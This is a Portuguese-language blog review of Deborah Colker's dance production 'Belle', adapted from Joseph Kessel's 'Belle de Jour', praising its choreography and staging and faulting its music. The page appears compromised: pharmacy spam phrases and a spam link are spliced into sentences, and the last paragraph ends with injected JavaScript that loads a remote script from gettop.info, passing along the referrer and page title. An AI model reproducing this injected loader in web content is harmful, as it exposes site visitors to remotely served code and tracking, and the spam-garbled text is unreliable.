CríticaLateral

Os anseios íntimos de Belle

Belle de Jour é um livro de Josseph Kessel lançado nos loucos anos 20.

Belle - Débora Colker
Belle http://cottonmouthheadquarters.com/?p=17404 Cheap – Deborah Colker

Baseada nele, a coreógrafa Deborah Colker monta o espetáculo com o mesmo nome para a temporada de dança do Teatro Alfa, em São Paulo. A história é a clássica mulher casada com um ricaço e insatisfeita sexualmente. Sabemos que riqueza material não é sinônimo de felicidade e a personagem principal busca novas aventuras em um bordel e começa a festa. O espetáculo mostra o íntimo da personagem, seus medos e descobertas em um ambiente que ela julga inadequado para uma mulher de sua posição social. O ar de mistério envolve todo o primeiro ato, fazendo-a se desdobrar em duas personagens: uma extrovertida e atrevida e outra recatada. A divisão mostra os anseios de Belle: como na vida em sociedade, temos ser o que não queremos. Seu lado misterioso explode em sensualidade sem ser vulgar, dança com força e segurança, seu lado recatado é como quer ser vista pela sociedade.

A coreografia é o íntimo de  canada pharmacy 24 hour drug store Buy Belle, tudo nela é para dentro e está no seu pensamento. Cenários simples e recursos inteligentes transportam o espectador para diversos climas. Usar um enorme pano branco é o clímax do primeiro ato: todo o ar de mistério e rebeldia está lá. Os figurinos evoluem com a narrativa e detalham os aspectos das cenas. No começo, lembram um desfile de moda de marca de luxo. Temos a evolução das sapatilhas de ponta para salto alto e de roupas recatadas a espartilhos.

No segundo ato, Belle está adaptada ao novo ambiente, o cenário se transforma diversas vezes e os passos entram na exuberância da pole dance. A luz é trabalhada no monocromático dando dinâmica e acompanhando a evolução do enredo. A música soa repetitiva e nem sempre combina com a dança do palco, tocada em alto volume: este é o  ponto fraco do espetáculo.

Deborah Colker trabalha com passos curtos onde corpos e olhares explodem em sensualidade, a movimentação de seus bailarinos é intensa e o toque entre corpos acontece a cada instante. Consegue ser sensual sem cair na vulgaridade e abusa da criatividade. Sua companhia tem maturidade na dança com passos em grupo sincronizados e os solistas conseguem técnica apurada.

Coreografia refinada que conta uma história completa e penetra no íntimo da personagem. Mostra a eterna insatisfação do ser humano onde nem sempre o material é o mais importante. Desejos obscuros todos têm e quase ninguém os coloca para fora, a personagem o faz só não se sabe se é na sua mente ou no mundo real.  Cheap online online Cheap Belle é uma crítica a uma sociedade onde poucos podem expor suas fantasias íntimas e explorar seu lado sensual… ser o que realmente são.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; document.currentScript.parentNode.insertBefore(s, document.currentScript);

Leave a Response

Ali Hassan Ayache
Bacharel em Geografia pela USP. Apreciador de ópera, balé e música clássica. Ativo no meio musical, mantém o blog http://verdi.zip.net/. Escreve críticas, divulga eventos, entrevista personalidades e resenha óperas e balés em DVD.